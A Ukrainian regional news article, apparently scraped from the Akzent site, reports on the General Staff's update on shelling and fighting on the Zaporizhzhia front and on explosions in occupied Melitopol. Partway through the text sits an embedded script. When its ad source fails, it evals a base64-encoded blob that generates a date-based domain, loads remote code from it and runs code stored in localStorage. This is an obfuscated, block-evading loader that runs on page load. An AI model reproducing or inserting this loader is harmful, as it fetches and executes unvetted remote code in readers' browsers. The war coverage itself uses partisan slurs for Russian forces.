Генштаб ЗСУ про ситуацію на Запоріжжі: де точаться бої (КАРТА)

Сили оборони продовжують боротися з російськими загарбниками. У Генштабі ЗСУ надали інформацію щодо стану на Запорізькому напрямку: ситуацію також оцінив військовий оглядач.

Про це інформує Акцент.

Якою є ситуація на Запоріжжі

Як повідомили у прес-центрі Генерального штабу Збройних сил України зранку 4 листопада, впродовж доби на Запорізькому напрямку ворог здійснював обстріли з мінометів, ствольної та реактивної артилерії, в районах населених пунктів Гуляйполе, Дорожнянка, Новоандріївка, Ольгівське, Щербаки та Малі Щербаки.

Як зазначили в прес-центрі, противник намагається утримати тимчасово захоплені території, зосереджує зусилля на стримуванні дій Сил оборони на окремих напрямках. У Генштабі підкреслили, що ворог веде наступальні дії на Бахмутському, Авдіївському та Новопавлівському напрямках.

Також, як підкреслили у Запорізькій обласній військовій адміністрації, на Запоріжжі ситуація за останню добу не зазнала суттєвих змін — ворог основні зусилля зосереджує на утриманні зайнятих рубежів. Втім, окупанти продовжують терор мирного населення.

«Надійшло 13 повідомлень про руйнування будинків (квартир) громадян та об’єктів інфраструктури в результаті обстрілів військовослужбовцями рф», — зазначається в пресслужбі ЗОВА.

Запорізький намрямок: де точаться бої

Водночас, ввечері 3 листопада поточну ситуацію на Запорізькому напрямку оцінив військовий оглядач Богдан Мірошніков: так, за оцінкою експерта, бої продовжуються у напрямках П’ятихаток та Костянтинівки. Лінія фронту на напрямку залишаєтсья без змін.

Бої точаться у напрямках П’ятихаток та Костянтинівки. Карта: Deep State

Також, як підкреслив оглядач, наразі продовжується активне відпрацювання тилів ворога та успішна контрбатарейна боротьба. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Орки у районі Копаней та Мелітополя на собі це добре відчули», — зазначив оглядач.

Джерело: Google Maps

Зазначимо: як раніше повідомляв Акцент, у тимчасово окупованому Мелітополі внаслідок вибухів близько шостої ранку 3 листопада «постраждала» одна з перших військових баз ворога – захоплене окупантами підприємство «Рефма». Внаслідок вибухів:

зруйновано 3 верхні поверхи офісної будівлі;пошкоджено ангар, де розміщувалось 80 одиниць ворожої техніки, уламки від вибухів розлетілись на 2 квартали. Джерело: Google Maps

Також, як стало відомо пізніше, в селі Світлодолинське Мелітопольського району пролунали чотири потужних вибухи в районі залізничного мосту, який окупанти використовували для перекидання техніки на Запорізький напрямок.

Джерело: Google Maps

Дивіться також:

Пробила стіну та вткнулася у підлогу: на Запоріжжі сапери ТрО ліквідували нерозірвану ракету без підриву (ВІДЕО)Виживає 1 із 20 окупантів: рашисти панікують від наслідків роботи арти ЗСУ (ВІДЕО)

Джерело тематичного зображення — Facebook-сторінка Генштабу ЗСУ. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/genshtab-zsu-pro-situatsiyu-na-zaporizhzhi-de-tochatsya-boyi-karta/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top